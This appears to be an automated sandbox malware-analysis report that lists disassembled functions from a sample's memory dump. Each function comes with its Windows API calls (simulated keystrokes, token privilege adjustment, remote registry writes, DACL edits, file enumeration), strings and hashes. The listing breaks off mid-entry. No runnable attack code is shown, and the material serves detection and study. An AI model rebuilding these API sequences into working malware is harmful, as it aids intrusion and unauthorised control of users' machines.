Function 00B36F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B371C3
_memset.LIBCMT ref: 00B37539
_memmove.LIBCMT ref: 00B376AC

Strings

\b(?=\w), xrefs: 00B73769
[:>:]], xrefs: 00B37492
Q\E, xrefs: 00B37FCB
[:<:]], xrefs: 00B37479
DEFINE, xrefs: 00B72103
\b(?<=\w), xrefs: 00B73773

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: 80ed722402f5901fa02658da7b25f8897fae3a4c8355bfd85dcce91ef8ec16cf
Instruction ID: f577e38b17ef50b30af3d7a102b720951dbf1d66848f124b8dbb1fa951559a6f
Opcode Fuzzy Hash: 80ed722402f5901fa02658da7b25f8897fae3a4c8355bfd85dcce91ef8ec16cf
Instruction Fuzzy Hash: CF93B371A44219DFDB24CF58C881BADB7F1FF48710F2481AAE959AB381E7709E81DB50

Function 00B248D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00B248DF
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B5D665
IsIconic.USER32(?), ref: 00B5D66E
ShowWindow.USER32(?,00000009), ref: 00B5D67B
SetForegroundWindow.USER32(?), ref: 00B5D685
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B5D69B
GetCurrentThreadId.KERNEL32 ref: 00B5D6A2
GetWindowThreadProcessId.USER32(?,00000000), ref: 00B5D6AE
AttachThreadInput.USER32(?,00000000,00000001), ref: 00B5D6BF
AttachThreadInput.USER32(?,00000000,00000001), ref: 00B5D6C7
AttachThreadInput.USER32(00000000,?,00000001), ref: 00B5D6CF
SetForegroundWindow.USER32(?), ref: 00B5D6D2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B5D6E7
keybd_event.USER32(00000012,00000000), ref: 00B5D6F2
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B5D6FC
keybd_event.USER32(00000012,00000000), ref: 00B5D701
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B5D70A
keybd_event.USER32(00000012,00000000), ref: 00B5D70F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B5D719
keybd_event.USER32(00000012,00000000), ref: 00B5D71E
SetForegroundWindow.USER32(?), ref: 00B5D721
AttachThreadInput.USER32(?,?,00000000), ref: 00B5D748

Strings

Shell_TrayWnd, xrefs: 00B5D660

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: d4f5b2c1387095182392bfe6df511af0fbe447e10d7ab684473cbdb8bc549586
Instruction ID: 48fda030e1fc7cbbd6a14ef1cedf5bda7ff3d478ead3e85901a017b8e51abc4b
Opcode Fuzzy Hash: d4f5b2c1387095182392bfe6df511af0fbe447e10d7ab684473cbdb8bc549586
Instruction Fuzzy Hash: 27316671A403187BEB305FA19C8AFBF7EACEB45B51F104065FA04EB191DA705D41ABA1

Function 00B78310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00B787E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B7882B
Part of subcall function 00B787E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B78858
Part of subcall function 00B787E1: GetLastError.KERNEL32 ref: 00B78865

_memset.LIBCMT ref: 00B78353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00B783A5
CloseHandle.KERNEL32(?), ref: 00B783B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00B783CD
GetProcessWindowStation.USER32 ref: 00B783E6
SetProcessWindowStation.USER32(00000000), ref: 00B783F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00B7840A

Part of subcall function 00B781CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B78309), ref: 00B781E0
Part of subcall function 00B781CB: CloseHandle.KERNEL32(?,?,00B78309), ref: 00B781F2

Strings

default, xrefs: 00B78405
, xrefs: 00B78362
winsta0, xrefs: 00B783C8

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: f5b92a49efa455667904767a85905ee5e01c9b15f68f3804968cb9246da200ed
Instruction ID: 1b6e1462843a00aee4d7eb83c36bf2858aace963ed9428dbdd18c539ef6bf2f6
Opcode Fuzzy Hash: f5b92a49efa455667904767a85905ee5e01c9b15f68f3804968cb9246da200ed
Instruction Fuzzy Hash: 5F813C71940209AFDF11DFA4DC4AAFE7BB9FF05304F1481A9F929A6261DB318E14DB60

Function 00B8C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00B8C78D
FindClose.KERNEL32(00000000), ref: 00B8C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B8C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00B8C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B8C844
__swprintf.LIBCMT ref: 00B8C890
__swprintf.LIBCMT ref: 00B8C8D3

Part of subcall function 00B27DE1: _memmove.LIBCMT ref: 00B27E22

__swprintf.LIBCMT ref: 00B8C927

Part of subcall function 00B43698: __woutput_l.LIBCMT ref: 00B436F1

__swprintf.LIBCMT ref: 00B8C975

Part of subcall function 00B43698: __flsbuf.LIBCMT ref: 00B43713
Part of subcall function 00B43698: __flsbuf.LIBCMT ref: 00B4372B

__swprintf.LIBCMT ref: 00B8C9C4
__swprintf.LIBCMT ref: 00B8CA13
__swprintf.LIBCMT ref: 00B8CA62

Strings

%4d, xrefs: 00B8C8CD
%02d, xrefs: 00B8C91B, 00B8C925, 00B8C973, 00B8C9C2, 00B8CA11, 00B8CA60
%4d%02d%02d%02d%02d%02d, xrefs: 00B8C88A

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 3c1188738eac51fe9e44c4bf5c47fafdd0785256a12ca196f9836516e502833e
Instruction ID: 4b1a71b8727db85815bd45c728bbb038f75aeed6fa33e1f1721772466c8f28e9
Opcode Fuzzy Hash: 3c1188738eac51fe9e44c4bf5c47fafdd0785256a12ca196f9836516e502833e
Instruction Fuzzy Hash: F6A13BB2408315ABC714EFA4D886DBFB7ECFF95700F400969F59987191EA30DA09CB62

Function 00B8EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00B8EFB6
_wcscmp.LIBCMT ref: 00B8EFCB
_wcscmp.LIBCMT ref: 00B8EFE2
GetFileAttributesW.KERNEL32(?), ref: 00B8EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 00B8F00E
FindNextFileW.KERNEL32(00000000,?), ref: 00B8F026
FindClose.KERNEL32(00000000), ref: 00B8F031
FindFirstFileW.KERNEL32(*.*,?), ref: 00B8F04D
_wcscmp.LIBCMT ref: 00B8F074
_wcscmp.LIBCMT ref: 00B8F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 00B8F09D
SetCurrentDirectoryW.KERNEL32(00BD8920), ref: 00B8F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B8F0C5
FindClose.KERNEL32(00000000), ref: 00B8F0D2
FindClose.KERNEL32(00000000), ref: 00B8F0E4

Strings

*.*, xrefs: 00B8F048

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: fc00a1d1b308e492679da346ffe202f41b25ffe27a9b35a27a3a1ff46c89b803
Instruction ID: d18355dbfc0d1e130f7b0654d53c6633b77e50aea2d07f462d52c7c2afd78b9b
Opcode Fuzzy Hash: fc00a1d1b308e492679da346ffe202f41b25ffe27a9b35a27a3a1ff46c89b803
Instruction Fuzzy Hash: B231C03250021A6EDB14AFA4DC49BFEB7ECDF49360F1401B6E840E31A1EB70DA44CB65

Function 00BA0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BA0953
RegCreateKeyExW.ADVAPI32(?,?,00000000,00BAF910,00000000,?,00000000,?,?), ref: 00BA09C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00BA0A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00BA0A92
RegCloseKey.ADVAPI32(?), ref: 00BA0DB2
RegCloseKey.ADVAPI32(00000000), ref: 00BA0DBF

Strings

REG_SZ, xrefs: 00BA0AD0
REG_QWORD, xrefs: 00BA0D00
REG_DWORD, xrefs: 00BA0C83
REG_BINARY, xrefs: 00BA0D4D
REG_EXPAND_SZ, xrefs: 00BA0A2F
REG_MULTI_SZ, xrefs: 00BA0B7A

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 4d36ad0b91ea2c99b07955a7359af5705ef0c2011339e368dfc8a1d8112fb773
Instruction ID: 0119e112ed0b65adf89566f06ac2455b75b4a34130a7dd31502e3e112e76e94c
Opcode Fuzzy Hash: 4d36ad0b91ea2c99b07955a7359af5705ef0c2011339e368dfc8a1d8112fb773
Instruction Fuzzy Hash: 1A027F756046119FCB14EF24D885E2AB7E5FF8A314F0485ADF8999B3A2DB30ED41CB81

Function 00B8F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00B8F113
_wcscmp.LIBCMT ref: 00B8F128
_wcscmp.LIBCMT ref: 00B8F13F

Part of subcall function 00B84385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B843A0

FindNextFileW.KERNEL32(00000000,?), ref: 00B8F16E
FindClose.KERNEL32(00000000), ref: 00B8F179
FindFirstFileW.KERNEL32(*.*,?), ref: 00B8F195
_wcscmp.LIBCMT ref: 00B8F1BC
_wcscmp.LIBCMT ref: 00B8F1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 00B8F1E5
SetCurrentDirectoryW.KERNEL32(00BD8920), ref: 00B8F203
FindNextFileW.KERNEL32(00000000,00000010), ref: 00B8F20D
FindClose.KERNEL32(00000000), ref: 00B8F21A
FindClose.KERNEL32(00000000), ref: 00B8F22C

Strings

*.*, xrefs: 00B8F190

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 7d6957eae4b56dd599688fdf91c187b354800369bc42178e3b1b111889557256
Instruction ID: 24c880770d60d75cba80b2b091a69c8634d9a5e9a19fe6a6aea9514277ba1a0d
Opcode Fuzzy Hash: 7d6957eae4b56dd599688fdf91c187b354800369bc42178e3b1b111889557256
Instruction Fuzzy Hash: 3C316F3650021B6ADB20BEA4EC59BFEB7ECDF45360F1401E5F854A31B0EB309A45CB68

Function 00B8A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B8A20F
__swprintf.LIBCMT ref: 00B8A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B8A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B8A293
_memset.LIBCMT ref: 00B8A2B2
_wcsncpy.LIBCMT ref: 00B8A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B8A323
CloseHandle.KERNEL32(00000000), ref: 00B8A32E
RemoveDirectoryW.KERNEL32(?), ref: 00B8A337
CloseHandle.KERNEL32(00000000), ref: 00B8A341

Strings

\, xrefs: 00B8A247
\??\%s, xrefs: 00B8A22B
:, xrefs: 00B8A252

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: fa8f10824e35a7962f4b2933604cf4bbd20314e3f919c9ac52287ed0181753c5
Instruction ID: 8837d798a73cfaceb98481697b316c43428b179c499a04869f76d8ba39b4a906
Opcode Fuzzy Hash: fa8f10824e35a7962f4b2933604cf4bbd20314e3f919c9ac52287ed0181753c5
Instruction Fuzzy Hash: DE316DB190420AABDB21AFA0DC49FEB77FCEF89741F1041B6F509D6160EB749644CB29

Function 00B77CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B78202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B7821E
Part of subcall function 00B78202: GetLastError.KERNEL32(?,00B77CE2,?,?,?), ref: 00B78228
Part of subcall function 00B78202: GetProcessHeap.KERNEL32(00000008,?,?,00B77CE2,?,?,?), ref: 00B78237
Part of subcall function 00B78202: HeapAlloc.KERNEL32(00000000,?,00B77CE2,?,?,?), ref: 00B7823E
Part of subcall function 00B78202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B78255

Part of subcall function 00B7829F: GetProcessHeap.KERNEL32(00000008,00B77CF8,00000000,00000000,?,00B77CF8,?), ref: 00B782AB
Part of subcall function 00B7829F: HeapAlloc.KERNEL32(00000000,?,00B77CF8,?), ref: 00B782B2
Part of subcall function 00B7829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B77CF8,?), ref: 00B782C3

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B77D13
_memset.LIBCMT ref: 00B77D28
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B77D47
GetLengthSid.ADVAPI32(?), ref: 00B77D58
GetAce.ADVAPI32(?,00000000,?), ref: 00B77D95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B77DB1
GetLengthSid.ADVAPI32(?), ref: 00B77DCE
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B77DDD
HeapAlloc.KERNEL32(00000000), ref: 00B77DE4
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B77E05
CopySid.ADVAPI32(00000000), ref: 00B77E0C
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B77E3D
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B77E63
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B77E77

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 44788e627c479da81d293b33f9485020c54a8d61e4ed3198f876f64b7276bcce
Instruction ID: 83e8df4583b128ca17e789dcaaaaa8160053f33e6211455df3ead8f73a44ab61
Opcode Fuzzy Hash: 44788e627c479da81d293b33f9485020c54a8d61e4ed3198f876f64b7276bcce
Instruction Fuzzy Hash: 0D611C7194450AAFDF10DFA4DC45AEEBBB9FF05300F0481A9F929A7291DF319A15CB60

Function 00B366E1 Relevance: 18.4, Strings: 14, Instructions: 889COMMON

Download Yara Rule

Strings

CR), xrefs: 00B71287
NO_START_OPT), xrefs: 00B7114F
UTF), xrefs: 00B710FA
BSR_UNICODE), xrefs: 00B71338
NO_AUTO_POSSESS), xrefs: 00B7112E
ANY), xrefs: 00B712DE
LF), xrefs: 00B712A4
ANYCRLF), xrefs: 00B712FB
UTF16), xrefs: 00B710CF
LIMIT_MATCH=, xrefs: 00B71170
UCP), xrefs: 00B7110D
LIMIT_RECURSION=, xrefs: 00B711FC
BSR_ANYCRLF), xrefs: 00B7131E
CRLF), xrefs: 00B712C1

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 7162424fb70de26b926a8ec4edb04fcb40eb19f49b3159aadc6dd24e92f62f51
Instruction ID: 0990d7c4037f38b1e3f38b62984e30c00881b6eda6dc6e3fe375d94cc768aa62
Opcode Fuzzy Hash: 7162424fb70de26b926a8ec4edb04fcb40eb19f49b3159aadc6dd24e92f62f51
Instruction Fuzzy Hash: 05725075D002199BDB14CF5DC8817ADB7F5FF48710F24C5AAE859EB291EB309A81CBA0

Function 00B8001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B80097
SetKeyboardState.USER32(?), ref: 00B80102
GetAsyncKeyState.USER32(000000A0), ref: 00B80122
GetKeyState.USER32(000000A0), ref: 00B80139
GetAsyncKeyState.USER32(000000A1), ref: 00B80168
GetKeyState.USER32(000000A1), ref: 00B80179
GetAsyncKeyState.USER32(00000011), ref: 00B801A5
GetKeyState.USER32(00000011), ref: 00B801B3
GetAsyncKeyState.USER32(00000012), ref: 00B801DC
GetKeyState.USER32(00000012), ref: 00B801EA
GetAsyncKeyState.USER32(0000005B), ref: 00B80213
GetKeyState.USER32(0000005B), ref: 00B80221

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: df3b9d5f28bbf7fe3085038dfee44256a5d3ef3a9443f0eea8826fa05717583b
Instruction ID: a34f1779449ccaa9b173a568715f6a07cd4c2255075d4ec965446d3a822e8198
Opcode Fuzzy Hash: df3b9d5f28bbf7fe3085038dfee44256a5d3ef3a9443f0eea8826fa05717583b
Instruction Fuzzy Hash: EE51D9209147882DFB75FBA488557EABFF4DF023C0F0845D999C2571E2DAA49B8CC761

Function 00BA03DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BA0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B9FDAD,?,?), ref: 00BA0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BA04AC

Part of subcall function 00B29837: __itow.LIBCMT ref: 00B29862
Part of subcall function 00B29837: __swprintf.LIBCMT ref: 00B298AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00BA054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00BA05E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00BA0822
RegCloseKey.ADVAPI32(00000000), ref: 00BA082F

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.1428853631.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429000684.0000000000BD4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429084075.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1429109567.0000000000BE7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_WBI835q8qr.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: f3360dc3fb1f790931fddb1a32593f3548381ce0b66e4309da9dc455b5dabeea
Instruction ID: 33f9580fe7162dbb8081d94f1eb59908512f1607800650294ed339a9d1b1db4f
Opcode Fuzzy Hash: f3360dc3fb1f790931fddb1a32593f3548381ce0b66e4309da9dc455b5dabeea
Instruction Fuzzy Hash: 2AE16271604215AFCB14EF28C895D6ABBE4FF8A314F0485ADF949DB261DB30ED01CB92

Function 00B983BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B29837: __itow.LIBCMT ref: 00B29862
Part of subcall function 00B29837: __swprintf.LIBCMT ref: 00B298AC

CoInitialize.OLE32 ref: 00B98403
CoUninitialize.OLE32 ref: 00B9840E
CoCreateInstance.OLE32(?,00000000,00000017,00BB2BEC,?), ref: 00B9846E
IIDFromString.OLE32(?,?), ref: 00B984E1
VariantInit.OLEAUT32(?), ref: 00B9857B
VariantClear.OLEAUT32(?), ref: 00B985DC

Strings

Invalid parameter, xrefs: 00B984FA
NULL Pointer assignment, xrefs: 00B984B3
Failed to create object, xrefs: 00B98479, 00B9852F

Memory Dump Source

Source File: 00000000.00000002.1428889580.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

